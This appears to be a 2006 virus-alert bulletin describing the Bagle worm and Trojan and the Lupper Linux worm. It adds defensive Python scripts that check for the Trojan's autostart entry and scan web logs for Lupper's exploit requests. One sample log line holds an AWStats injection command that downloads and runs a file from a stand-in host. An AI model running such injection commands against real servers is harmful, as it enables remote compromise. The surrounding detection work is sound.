2006-02-17 11:00

[Virus Alert] 3 new worms found

Worm name: WORM_BAGLE.EW

Risk rating: HIGH

Damage Potential: HIGH

Distribution Potential: HIGH


Description:

This worm propagates by mailing copies of itself as attachments to its target recipients, using its own Simple Mail Transfer Protocol (SMTP) engine. Because it speaks SMTP directly, it does not depend on an installed mail client such as Microsoft Outlook, and the messages it sends leave no trace in the user's mail client. A workstation that has no business talking SMTP to the Internet can be stopped from spreading it by blocking outbound TCP/25 at the network edge and allowing only the organisation's mail relay through.

It also spreads over peer-to-peer (P2P) networks by dropping copies of itself into folders whose names contain the string SHAR (which matches names such as Shared), on the assumption that such folders are the download or share directories of P2P clients.

The dropped copies are usually named after popular applications and actresses to entice users into downloading and running them.


Trojan name: TROJ_BAGLE.CW

Risk rating: HIGH

Damage Potential: HIGH

Distribution Potential: HIGH


Description:

This Trojan is usually delivered as an email attachment by other malware, typically a member of the WORM_BAGLE family. It may also be downloaded from the Internet by unsuspecting users.

On execution it drops a copy of itself as anti_troj.exe in the Windows system folder and creates registry entries so that the copy runs at every system startup.

It then attempts to download files from several URLs. Those URLs are currently inaccessible, but if they come back online the Trojan will fetch whatever is hosted there, which is likely to be further malware. A failed download therefore does not mean a host is clean: the dropped file and its autostart entries are still present, and a file named anti_troj.exe in the system folder, or an autostart entry that launches one, should be treated as an indicator of this infection.
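The host-side check a practitioner would want for the persistence described above, as an added example that is not part of the Trend Micro description: the Python below reads a Windows reg export of the autostart keys and reports every entry that launches anti_troj.exe. The bulletin does not say which registry entries the Trojan writes, so looking at the HKLM and HKCU ...\CurrentVersion\Run and RunOnce keys is an assumption based on the "runs at every system startup" behaviour; the sample export, the C:\WINDOWS\system32 path and the other entries in it are constructed for this example.

```python
import re

# Constructed excerpt of a Windows "reg export" (not from the original page). Only the
# autostart Run keys are shown. The page does not say which registry entries TROJ_BAGLE.CW
# writes; using the HKLM/HKCU ...\CurrentVersion\Run keys is an assumption based on its
# "automatic execution at every system startup" behaviour, as is the C:\WINDOWS\system32 path.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VMware Tools"="C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe"
"anti_troj"="C:\\WINDOWS\\system32\\anti_troj.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"""

DROPPED_NAME = "anti_troj.exe"  # file name the bulletin says the Trojan drops

# Keys whose values Windows runs at logon/startup (Run and RunOnce under CurrentVersion).
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
# One REG_SZ value line in .reg syntax: "name"="data" (backslashes are doubled in the file).
VALUE_RE = re.compile(r'^"(?P<name>[^"]*)"="(?P<data>.*)"$')
# First *.exe token in a command line, whether or not the path is quoted or has arguments.
EXE_RE = re.compile(r'([^\\/"]+\.exe)\b', re.IGNORECASE)


def parse_reg_export(text):
    """Return the autostart entries in a .reg export as dicts with key, name and command."""
    autoruns = []
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]          # new key section, e.g. HKEY_LOCAL_MACHINE\...\Run
            continue
        m = VALUE_RE.match(line)
        if key is not None and m and RUN_KEY_RE.search(key):
            command = m["data"].replace("\\\\", "\\")  # undo .reg backslash doubling
            autoruns.append({"key": key, "name": m["name"], "command": command})
    return autoruns


def executable_name(command):
    """Base name of the executable launched by an autostart command line, lower-cased."""
    m = EXE_RE.search(command)
    return m.group(1).lower() if m else ""


def find_bagle_autoruns(autoruns):
    """Autostart entries that launch the file TROJ_BAGLE.CW drops, wherever it sits."""
    return [a for a in autoruns if executable_name(a["command"]) == DROPPED_NAME]


if __name__ == "__main__":
    for hit in find_bagle_autoruns(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f'{hit["key"]}  "{hit["name"]}" -> {hit["command"]}')
```

Collect the keys on the suspect host with reg export (for example reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg, and the same for HKCU); reg.exe writes the file as UTF-16, so open it with encoding="utf-16" before handing the text to parse_reg_export. A hit is only half the cleanup: the entry must be removed and the dropped file in the system folder deleted, or the Trojan is back at the next reboot.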


Worm name: ELF_LUPPER.F

Risk rating: HIGH

Damage Potential: HIGH

Distribution Potential: HIGH


Description:

This Linux executable (an ELF binary) is a command-line tool for connecting to arbitrary ports. It can connect back to a remote attacker's host and hand over a shell, giving the attacker control of the affected system.

It propagates by exploiting the XML-RPC for PHP remote code injection vulnerability, which is present in several web applications that bundle that library, and the AWStats CONFIGDIR command-execution flaw. It generates random IP addresses and sends each one requests with the vulnerable script paths and parameters appended, looking for exploitable installations.

More information on the vulnerability and the exploit can be found on the following Web pages:

• XML-RPC for PHP Remote Code Injection vulnerability

• AWSTATS_CONFIGDIR_EXPLOIT

The injected code makes the newly compromised host download and execute a copy of the worm. It may also connect to particular IP addresses to download a file named LISTEN, which it saves in /tmp.

On a web server that may have been hit, the evidence is in the access log and in /tmp: requests to awstats.pl whose configdir parameter contains shell metacharacters, POST requests to xmlrpc.php under whatever path the application installs it, the file LISTEN in /tmp, and a web-server process holding an outbound connection it has no reason to hold. Patching AWStats and every application that bundles XML-RPC for PHP removes both entry points; the worm itself is only the payload.
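The log-side check for the propagation behaviour described above, as an added example that is not from the original bulletin or from Trend Micro: the Python below reads Apache combined-format access-log lines, flags awstats.pl requests whose configdir parameter carries a pipe (the CONFIGDIR flaw passes the value to a Perl open() call, and the pipe turns it into a command), flags POST requests to any xmlrpc.php path, and then lists sources that probed more than one xmlrpc.php location, which is scanner behaviour. The log lines, the addresses 10.0.0.5 and 192.0.2.10, and the download command in the first line are constructed for this example. The XML-RPC request body, where the real injection lives, is not in an access log, so that rule yields a lead to check against the host rather than proof of exploitation.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access-log lines (not from the original bulletin).
# 10.0.0.5 plays the infected scanner; 192.0.2.10 (TEST-NET) stands in for the host it
# tells victims to fetch the worm from. The download command mirrors the "save LISTEN
# in /tmp" behaviour the bulletin describes but is invented for this example.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Feb/2006:11:02:13 +0800] "GET /awstats/awstats.pl?configdir=|echo;cd%20/tmp;wget%20192.0.2.10/listen;chmod%20+x%20listen;./listen;echo| HTTP/1.1" 200 1843 "-" "lwp-trivial/1.36"
10.0.0.5 - - [17/Feb/2006:11:02:14 +0800] "POST /xmlrpc.php HTTP/1.1" 200 521 "-" "lwp-trivial/1.36"
10.0.0.5 - - [17/Feb/2006:11:02:14 +0800] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 288 "-" "lwp-trivial/1.36"
192.168.1.20 - - [17/Feb/2006:11:05:00 +0800] "GET /awstats/awstats.pl?config=site1&output=main HTTP/1.1" 200 9201 "-" "Mozilla/5.0"
192.168.1.21 - - [17/Feb/2006:11:06:00 +0800] "GET /index.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD target protocol", status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)


def parse_query(query):
    """Decode a query string into {name: value} without turning '+' into a space, so
    an injected 'chmod +x' survives the way the target's CGI would have seen it."""
    params = {}
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            params[unquote(name)] = unquote(value)
    return params


def scan_access_log(text):
    """Flag the two request shapes ELF_LUPPER.F uses to spread; one dict per matching line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m["target"].partition("?")
        script = path.rsplit("/", 1)[-1].lower()
        hit = {"src": m["src"], "path": path, "status": int(m["status"]), "command": None}
        if script == "awstats.pl":
            # CONFIGDIR flaw: a pipe in configdir makes AWStats' Perl open() run the value.
            configdir = parse_query(query).get("configdir", "")
            if "|" in configdir:
                hit.update(rule="awstats-configdir-exec", command=configdir.strip("|"))
                hits.append(hit)
        elif script == "xmlrpc.php" and m["method"] == "POST":
            # The PHP XML-RPC injection rides in the POST body, which access logs never
            # record, so this is a lead to check against the body or the host, not proof.
            hit.update(rule="xmlrpc-php-post")
            hits.append(hit)
    return hits


def scanner_sources(hits, min_paths=2):
    """Sources that POSTed to several distinct xmlrpc.php locations. A legitimate client
    knows where its XML-RPC endpoint is; walking a list of install paths is a scanner."""
    paths = {}
    for h in hits:
        if h["rule"] == "xmlrpc-php-post":
            paths.setdefault(h["src"], set()).add(h["path"])
    return sorted(src for src, seen in paths.items() if len(seen) >= min_paths)


if __name__ == "__main__":
    found = scan_access_log(SAMPLE_LOG)
    for h in found:
        print(h["src"], h["rule"], h["path"], h["status"], h["command"] or "")
    print("scanners:", scanner_sources(found))
```

The command field of an awstats hit is the exact shell string the attacker ran, which tells the responder where the worm copy was fetched from and what it was saved as; a 200 on that request means the web server user executed it, so the host is compromised regardless of whether the download later succeeded.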


References: http://www.trendmicro.com/vinfo/ (TrendMicro Virus Security Info)

http://www.trendmicro.com/vinfo/zh-tw/default.asp (Traditional Chinese TrendMicro Virus Security Info)
